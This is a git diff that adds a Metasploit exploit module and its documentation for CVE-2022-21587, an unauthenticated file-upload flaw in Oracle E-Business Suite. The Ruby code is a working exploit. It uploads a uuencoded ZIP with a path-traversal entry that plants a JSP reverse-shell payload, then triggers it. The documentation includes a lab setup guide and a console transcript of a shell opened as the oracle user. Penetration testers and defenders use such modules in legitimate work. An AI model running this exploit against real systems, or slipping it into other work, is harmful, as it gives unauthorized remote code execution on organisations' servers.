diff --git a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
new file mode 100644
index 0000000000..02a499c1d8
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-21587, an unauthenticated arbitrary file upload vulnerability in Oracle
+Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions
+12.2.3 through to 12.2.11.
+
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution
+as the `oracle` user, and will use the `java/jsp_shell_reverse_tcp` payload by default.
+
+The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self
+hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and
+HP-UP. This exploit module has been tested against the Linux based appliance, specifically
+version 12.2.10.
+
+A full technical analysis of the vulnerability can be found on
+[AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
+
+## Target Setup
+
+To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance
+image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
+
+* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery)
+and login to search for the required software. You will need to search for `REL: Oracle VM Virtual Appliance for
+Oracle E-Business Suite` to find the appropriate download links. The version number should be listed at the end of the link.
+
+* You will be presented with multiple ZIP files to download. These files will be extracted and
+concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how
+to do this, as well as additional configuration instructions, can be found in the extracted
+documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business
+Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation
+and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
+
+* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance.
+You will require around 320 GB of hard disk space to complete this operation. Note, issues were encountered
+if the IP address for the appliance changed after the initial install. It is recommended to use either a
+static IP address or ensure your DHCP server provides the same address to the appliance.
+
+* When booting the virtual appliance you will be asked to select a Linux kernel to boot from. The option
+`Oracle Linux Server 7.9, with Linux 3.10.0-1160.11.1.e17.x86_64` was chosen during testing.
+
+* Upon booting the virtual appliance for the first time you will be asked to login. Enter the username `root`
+and follow the instructions displayed in the console to set the default passwords for the `root` and
+`oracle` and `applmgr` user accounts. If asked to install the VISION demo instance, enter `VISION` to install
+the demo data.
+
+* Once installation and setup has been completed, you can SSH into the appliance as the user
+`oracle` and start the database and application services with the following commands. Note, it has been observed that
+when starting the apps, some may timeout when starting (an error will be displayed in the console), and may require
+running `startapps.sh` a second time.
+
+```
+cd /u01/install/APPS/scripts/
+./startdb.sh
+./startapps.sh
+```
+
+* You can now access the WebLogic server over HTTP port `8000`.
+
+## Options
+
+## Verification Steps
+
+From msfconsole perform the following steps:
+
+1. `use exploit/linux/http/oracle_ebs_rce_cve_2022_21587`
+2. Set `RHOST` to the target address and `RPORT` to the target port. The default `RPORT` is 8000 for
+HTTP and 4443 for HTTPS. If using HTTPS set `SSL` to `true`.
+3. Set `LHOST` and `LPORT` values for the default `java/jsp_shell_reverse_tcp` payload.
+4. `check` to ensure the target is vulnerable.
+5. `exploit`
+6. Verify a command session has been opened and you can execute commands as the `oracle` user.
+
+## Scenarios
+
+### Oracle E-Business Suite 12.2.10 - Oracle Virtual Appliance (OVA)
+
+```
+msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options
+
+Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
+                                       oit/basics/using-metasploit.html
+   RPORT    8000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Oracle EBS on Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
+RHOST => 192.168.86.37
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
+LHOST => 192.168.86.5
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
+[*] 192.168.86.37:8000 - The target appears to be vulnerable. Oracle EBS version 12.2.10 detected.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.5:4444 
+[*] Targeting the endpoint: /OA_HTML/BneUploaderService
+[*] Triggering the payload...
+[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/ygrne.jsp
+[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:59288) at 2023-02-10 12:20:43 +0000
+
+id
+uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.37 - Command shell session 1 closed.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
+```
diff --git a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
new file mode 100644
index 0000000000..8cab7824dd
--- /dev/null
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications
+          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
+          order to gain remote code execution as the oracle user.
+        },
+        'Author' => [
+          'sf', # MSF Exploit & Rapid7 Analysis
+          'HMs', # Python PoC
+          'l1k3beef', # Original Discoverer
+        ],
+        'References' => [
+          ['CVE', '2022-21587'],
+          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],
+          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],
+          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']
+        ],
+        'DisclosureDate' => '2022-10-01',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # Code execution as user 'oracle'
+        'Targets' => [
+          [
+            'Oracle EBS on Linux (OVA Install)',
+            {
+              'Platform' => 'linux',
+              'EBSBasePath' => '/u01/install/APPS/fs1/',
+              'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',
+              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/'
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8000)
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/OA_HTML/FrmReportData'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown unless res.code == 200
+
+    match = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
+
+    if match && (match.length == 2)
+      version = Rex::Version.new(match[1].gsub('_', '.'))
+
+      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
+        return CheckCode::Appears("Oracle EBS version #{version} detected.")
+      end
+
+      return CheckCode::Safe("Oracle EBS version #{version} detected.")
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
+
+    target_url = "/OA_HTML/#{endpoints.sample}"
+
+    print_status("Targeting the endpoint: #{target_url}")
+
+    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'
+
+    jsp_path = '../' * target['EBSUploadPath'].split('/').length
+
+    jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"
+
+    jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file(jsp_path, payload.encoded)
+
+    # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.
+    # For a detailed description refer to the Rapid7 AttackerKB analysis in the References section of this module.
+    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"
+    uue_data << [zip.pack].pack('u')
+    uue_data << "end\n"
+
+    uue_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.uue"
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))
+
+    register_file_for_cleanup(jsp_absolute_path)
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => target_url,
+        'vars_get' => { 'bne:uueupload' => 'true' },
+        'encode_params' => true,
+        'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+        'data' => mime.to_s
+      }
+    )
+
+    unless res && res.code == 200 && res.body.include?('bne:text="Cannot be logged in as GUEST."')
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
+    end
+
+    print_status('Triggering the payload...')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => "/forms/#{jsp_name}"
+    )
+  end
+
+end